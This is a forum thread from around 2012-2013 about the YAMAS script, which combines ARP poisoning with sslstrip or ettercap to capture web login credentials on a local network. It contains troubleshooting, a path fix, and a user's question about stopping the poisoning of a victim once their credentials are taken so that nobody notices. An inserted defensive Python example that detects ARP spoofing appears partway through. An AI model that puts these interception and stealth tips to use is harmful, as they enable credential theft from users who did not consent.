I will shut up before somebody may have a different say about expressing thanks to you

Thanks Comax

I used this script against my smart phone and my Windows 7 laptop with the latest security software and it did not let me down. I have said thank you before and here I am again saying a big thanks to comax :-)

comaX
11-25-2012, 06:33 AM
Comax, I have never had any problem with this script, no matter what version. I think it's wonderful and as long as you keep updating it, I'll keep on using it.[...]

Thanks Comax


I used this script against my smart phone and my Windows 7 laptop with the latest security software and it did not let me down. I have said thank you before and here I am again saying a big thanks to comax :-)

Gentlemen, I am humbled. Thanks for the positive feedback !

ShadowMaster
11-27-2012, 04:31 PM
I'm still not giving up on my dream of seeing ettercap filters as one of the options comaX. How's that coming along?

comaX
11-27-2012, 06:17 PM
Oh man... I am so f'ing swamped right now... I started writing a new version (and not update) of Yamas a while back but haven't had the time to do much on it... This year was supposed to be easier study-wise, but guess what? It absolutely is not. It's worse. If I get the time during the holidays I'll try to work on it, but I'm supposed to be preparing exams for early January.

I'll keep you guys posted.

aronian
12-06-2012, 04:04 PM
Hi, first of all... awesome script!! Now, I was just wondering, is there a way to know exactly which IP address the logs are coming from if you are poisoning a whole network? And is it possible to stop the ARP poisoning on just the selected IP, but continue poisoning the whole network?

I am asking this because there are lots of SSL pages (like Facebook or Hotmail) that, after running the script, send us the username and password information but the user is not able to access them correctly. For example, in Hotmail the user returns to the login page again and again, and in Facebook the user can access his account but it doesn't load properly.

So my idea was to stop the ARP poisoning on just the selected IP address once I got his credentials, so he will then be able to access all pages correctly.

Of course I am not intending to do this for the wrong purposes, I just think that if you are going to test your network doing a MITM, you should do it right, without anyone noticing what you are doing, even if you have their authorization to do so.

FettMaster
12-23-2012, 08:32 PM
Hi. The script is great, but since I use BT5R3 the script doesn't work fine.

It runs smoothly, but the password window doesn't show anything. I'm trying Facebook, Twitter, Gmail, etc. and nothing. Can anyone help me? Thanks a lot.

comaX
12-24-2012, 04:45 AM
Hi, first of all... awesome script!! Now, I was just wondering, is there a way to know exactly which IP address the logs are coming from if you are poisoning a whole network? And is it possible to stop the ARP poisoning on just the selected IP, but continue poisoning the whole network?
That is not possible, unfortunately. What you can do is attack all connected equipment independently, and then stop them separately. And, nope, sslstrip doesn't log the LAN IP. You could run Wireshark alongside to check for matching packets.


I am asking this because there are lots of SSL pages (like Facebook or Hotmail) that, after running the script, send us the username and password information but the user is not able to access them correctly. For example, in Hotmail the user returns to the login page again and again, and in Facebook the user can access his account but it doesn't load properly.
Yeahp, that's because of sslstrip, I think. Have you tried with ettercap? (yamas -e)


So my idea was to stop the ARP poisoning on just the selected IP address once I got his credentials, so he will then be able to access all pages correctly.
Of course I am not intending to do this for the wrong purposes, I just think that if you are going to test your network doing a MITM, you should do it right, without anyone noticing what you are doing, even if you have their authorization to do so.
I hear you, but nope, that's just not possible, afaik. Sorry!
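The ARP poisoning discussed in this exchange is visible on the wire as conflicting ARP "is-at" replies for the same IP (typically the gateway). The following is an added example, not code from the YAMAS script or from anyone in this thread, showing the detection logic a defender can run over observed replies; the reply records and MACs are constructed for the example, and the optional pinned table is an assumed static ARP list.

```python
"""Added example (not part of YAMAS or this thread): flag ARP poisoning
by spotting an IP that is claimed by more than one MAC address.

A host that remembers the first MAC it saw for each IP (or a pinned,
trusted MAC for the gateway) can alert when a later 'is-at' reply
claims the same IP for a different MAC."""

from collections import defaultdict

# Constructed sample: (sender IP, sender MAC) taken from ARP 'is-at'
# replies. 192.168.1.1 is first seen at aa:bb:cc:00:00:01 and is later
# claimed by a second MAC, which is what poisoning looks like on the wire.
SAMPLE_REPLIES = [
    ("192.168.1.1", "aa:bb:cc:00:00:01"),
    ("192.168.1.20", "aa:bb:cc:00:00:20"),
    ("192.168.1.1", "aa:bb:cc:00:00:01"),
    ("192.168.1.1", "de:ad:be:ef:00:99"),   # conflicting claim
    ("192.168.1.20", "aa:bb:cc:00:00:20"),
    ("192.168.1.1", "de:ad:be:ef:00:99"),   # spoofers resend periodically
]


def detect_arp_conflicts(replies, pinned=None):
    """Return one alert dict per reply whose MAC differs from the first
    MAC seen for that IP. `pinned` (assumed static table, IP -> trusted
    MAC, e.g. the gateway's MAC recorded on a clean boot) seeds the
    table so that the very first spoofed reply is caught as well."""
    seen = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        known = seen.setdefault(ip, mac)   # first sighting becomes the baseline
        if known != mac:
            alerts.append({"ip": ip, "expected": known, "observed": mac})
    return alerts


def summarize(alerts):
    """Collapse alerts into {ip: set of conflicting MACs} for a report."""
    out = defaultdict(set)
    for alert in alerts:
        out[alert["ip"]].add(alert["observed"])
    return dict(out)


if __name__ == "__main__":
    found = detect_arp_conflicts(SAMPLE_REPLIES)
    for alert in found:
        print(f"ALERT {alert['ip']}: expected {alert['expected']}, got {alert['observed']}")
    print(summarize(found))
```

In practice the replies would come from a packet capture or the host's ARP table polled over time; a conflicting gateway MAC is the signal to investigate, and pinning the gateway MAC (static ARP entry) is the corresponding mitigation on a single host.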

wewe73
12-24-2012, 06:10 PM
Hi. The script is great, but since I use BT5R3 the script doesn't work fine.

It runs smoothly, but the password window doesn't show anything. I'm trying Facebook, Twitter, Gmail, etc. and nothing. Can anyone help me? Thanks a lot.

it works just fine over here using BT5-R3

bahaeddine4
12-25-2012, 08:58 PM
I haven't tried this yet, but does it work in the secure mode (https)?

KillerKenny
01-07-2013, 01:44 AM
The "password" window is only saying

"Parsing /tmp/yamas.txt for credentials."

What does it mean?

comaX
01-07-2013, 01:39 PM
I haven't tried this yet, but does it work in the secure mode (https)?
You should know more about how it works. Hint: sslstrip.


The "password" window is only saying

"Parsing /tmp/yamas.txt for credentials."

What does it mean?

Means it hasn't found anything yet.

nwhit131
01-28-2013, 02:36 AM
I have a problem with the script. When it's running, https websites just timeout. Other websites work, but not those. Any help would be greatly appreciated.

Special2k3
03-20-2013, 06:26 AM
Hello,

Nice script, but it doesn't work for me out of the box on Backtrack 5 KDE 64bit. I always got the message "file or directory not found" while it tried to parse the log file. I noticed that sslstrip was not running. I had to change line 12 from


sslstrip_dir=/usr/share/sslstrip

to


sslstrip_dir=/pentest/web/sslstrip

and set the rights on sslstrip to execute.

Just for information, if anybody else runs into this problem.
If you start yamas, it should look like this:


[+] Activating sslstrip...
Choose filename to output : (default = yamas)

Sslstrip will be listening on port 8080 and outputting log in /tmp/yamas.txt

sslstrip 0.9 by Moxie Marlinspike running...

[-] Sslstrip is running.

If the "sslstrip 0.9 by Moxie Marlinspike running..." is missing in your output, then sslstrip isn't running. Even if yamas says "Sslstrip is running". You must see the "sslstrip 0.9 by Moxie Marlinspike running..." message.

Best regards

Special2k3